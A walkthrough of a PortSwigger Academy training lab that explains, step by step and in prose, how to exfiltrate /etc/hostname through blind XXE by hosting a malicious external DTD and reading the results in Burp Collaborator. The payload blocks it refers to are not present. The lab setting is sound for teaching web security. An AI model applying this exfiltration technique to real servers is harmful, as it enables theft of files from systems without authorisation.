Solving Portswigger Academy: Exploiting blind XXE to exfiltrate data using a malicious external DTD
This lab has a “Check stock” feature that parses XML input but does not display the result.
To solve the lab, exfiltrate the contents of the
/etc/hostnamefile.
Access the lab and view details of any product, then check for available stock.
Let’s first try to use collaborator server to test if we can call it.When I sent below request, it shows DNS and HTTP hits on collaborator server.
We can use below payload to exfilterate the hostname.
What we need to do here is we need to host the dtd file on server we can control. Lab provides us with the exploit server.
Go to exploit server and add below contents and store it on exploit server.Once you store it also copy the URL of the server where you are storing the dtd file.
As you can see the http URL should be the burp collaborator’s server URL.
Now go to repeater and define the parameter entity which have URL to the exploit server.
Now after few seconds click on Poll Now in collaborator server, you will see DNS and HTTP requests and in HTTP request you will see the GET request with parameter ‘x’ and some value. i.e. the hostname.
